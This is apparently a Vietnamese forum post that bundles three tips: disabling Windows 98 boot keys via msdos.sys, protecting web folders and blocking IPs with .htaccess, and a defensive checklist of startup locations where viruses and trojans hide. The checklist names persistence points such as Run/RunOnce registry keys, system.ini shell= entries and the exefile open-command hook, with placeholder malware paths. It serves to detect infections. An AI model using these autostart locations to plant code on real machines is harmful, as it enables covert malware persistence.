Ok, chắc bạn có suy nghĩ rằng mình chỉ cần nhấn phím F8 liên tục trong suốt quá trình boot và sau đó vào hệ thống bằng chế độ khác. Nhưng cũng có một cách vô hiệu hoá chức năng này của windows. Nhấn chuột phải vào file C:\msdos.sys và chọn properties. Bỏ tuỳ chọn read only. Bây giờ ta mở "msdos.sys" bằng notepad. File này như sau
Code:
*******************************************************
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootMulti=1
BootGUI=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.2222
;
;Những dòng sau đây được yêu cầu cho tính tương thích với những chương trình khác.
;Đừng remove chúng (MSDOS.SYS cần >1024 bytes).
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxc
**************************************************************
Bây giờ thêm dòng "BootKeys=0"(không có dấu “) sau dòng "WinVer=4.10.2222". Vì vậy phím F8, F5, v.v.. sẽ không còn tác dụng trong quá trình khởi động. Và đừng quên đánh dấu "read only" lại vì nó là một file hệ thống rất quan trọng.
Chỉ có một cách phá vỡ hệ thống là bằng cách dùng đĩa khởi động mà thôi. Nhưng có còn hơn không.
|
|
|
File .htaccess hầu hết được dùng để đặt mật khẩu cho web site của bạn. ví dụ. nếu tôi muốn dùng mật khẩu để bảo vệ site http://domain.com/secrect/ Tôi có thể tạo một file gọi là .htaccess trong folder secret nằm trên server đó. Ngoài ra file .htaccess còn dùng để từ chối việc liệt kê file trong folder. Điều này rất tiện khi bạn không có file index ví dụ. images/ cgi-bin/ db/ .
Có rất nhiều tùy chọn cho bạn đặt vào file .htaccess. Ở đây tôi chỉ đề cập đến 'AuthConfig' và 'Limit'.
QUAN TRỌNG: File .htaccess hoạt động trong toàn bộ cây thư mục. Ví dụ. nếu bạn có một file .htaccess trong /www/.htaccess thì nó sẽ có tác dụng đến /www/public/, /www/pictures, v.v.. Nếu bạn chỉ muốn không cho liệt kê thư mục trong /www/pictures thì đặt file .htaccess vào /www/pictures chứ KHÔNG phải vào /www !
Có một tùy chọn khác với thẻ <Directory> nhưng tôi sẽ không đề cập trong bài này . Bạn có thể dùng google nếu muốn tìm hiểu kỹ hơn.
Đặt mật khẩu bảo vệ:
==============
Việc đầu tiên là phải tạo một file gọi là .htpasswd để chứa username và mật khẩu (đừng lo lắng gì, chúng đã được mã hóa). Có nhiều cách tạo mật khẩu mã hóa. Cách dễ nhất là vào http://www.euronet.nl/~arnow/htpasswd/ tạo một cái. Sau đó bạn copy/paste dòng kết quả vào file .htpasswd. Tiếp theo ta tạo file .htaccess. Ví dụ như sau:
Code:
AuthUserFile /home/leon/secret/.htpasswd
AuthGroupFile /dev/null
AuthName "My .htaccess secured web page!"
AuthType Basic
require valid-user
Dòng đầu tiên là nơi bạn chứa file .htpasswd. Những dòng còn lại chắc bạn cũng đã hiểu!
Từ chối ip:
Nếu bạn muốn cấm (block) vài ip hay isp thì đặt một trong những dòng sau vào file .htaccess:
Code:
order allow,deny
deny from 123.45.67.89
deny from 45.67.89.
allow from all
Nó sẽ cấm 123.45.67.89 và mọi ip bắt đầu với 45.67.89.
Bên cạnh đó bạn cũng có thể làm như sau:
Code:
order deny,allow
deny from all
allow from 123.45.67.8
Nó sẽ cấm tất cả IP ngoại trừ 123.45.67.8
Ngoài ra bạn có thể tham khảo thêm ở:
http://httpd.apache.org/docs/howto/htaccess.html
http://wsabstract.com/howto/htaccess.shtml
http://www.he.net/faq/tutorials/htaccess/demo.html
http://www.freewebmasterhelp.com/tutorials/htaccess/
http://baremetal.com/gadgets/htaccess/
|
|
|
Tất cả các loại virus, trojan và những trình hack đều có thể tự động thực thi bất cứ khi nào máy của bạn khởi động. Những file hay folder sau đều có điều kiện thuận lợi để tự thực thi khi hệ thống khởi động.
1. C:\autoexec.bat
Nếu bạn mở file này bằng notepad thì sẽ thấy có vài lệnh dos mà phải được thi hành lúc khởi động. Vì thế nếu có mục "C:\virus_folder\virus.exe" thì virus.exe sẽ luôn luôn chạy khi bạn khởi động PC.
2. C:\windows\Start Menu\programs\startup
Bất kỳ file nào ở trong thư mục này sẽ tự động thực thi khi khởi động PC.
3. C:\windows\win.ini
Ở file này dưới phần windows nếu có mục 'run=something.exe' hoặc 'load=something.exe' thì chắc chắn something.exe đó là virus hay trojan.
4. C:\windows\system.ini
Dưới phần boot theo mặc định thì có đoạn "shell=explorer.exe". Nhưng nếu là "shell=virus.exe,explorer.exe" thì máy của bạn đã bị dính virus.
5. C:\config.sys
File này chủ yếu là chứa những mục nhập của driver. Nhưng cũng cần theo dõi đề phòng.
6. C:\explorer.exe
nếu nó tồn tại thì sẽ thực thi đầu tiên ngoại trừ trường hợp thông thường là C:\windows\explorer.exe. Có tác dụng với Windows95, 98, ME. Nên cẩn thận!
***************
Tip: Tất cả những file trên có thể được mở cùng lúc bằng cách vào Start -->> Run, gõ "sysedit" (không có dấu ").
***************
7. Ở Registry có thể là
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Something"="c:\directory\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Something"="c:\directory\virus.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Something"="c:\directory\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
"Something"="c:\directory\Virus.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Something"="c:\directory\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Something"="c:\directory\virus.exe"
**************
Lưu ý: -- Chỉnh sửa registry rất là nguy hiểm. Nếu bạn không biết đó là cái gì thì đừng mở ra hay xóa nó. Chỉ cần sai một tí là phải cài lại win đó!
**************
8. Registry Shell Open
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
Một key với giá trị "%1 %*" có đặt ở đây và đôi khi là những file thực thi nằm ở đây. Nó được sử dụng như: virus.exe "%1 %*"; và nhớ xem kỹ qua.
9. ICQ Net Detect
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
Key này bao gồm tất cả những file được thực thi nếu ICQ phát hiện bạn đã kết nối Internet. Bạn có thể hiểu rằng chức năng này của ICQ rất thuận tiện cho attacker.
10. ActiveX Component
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
StubPath=C:\directory\virus.exe
VÌ vậy nếu chương trình antivirus không phát hiện được virus hay trojan nhưng bạn vẫn còn nghi ngờ thì nên kiểm tra qua bằng những cách ở trên để chắc ràng mình đã an toàn hơn ).
|
|
|
|
|
|
|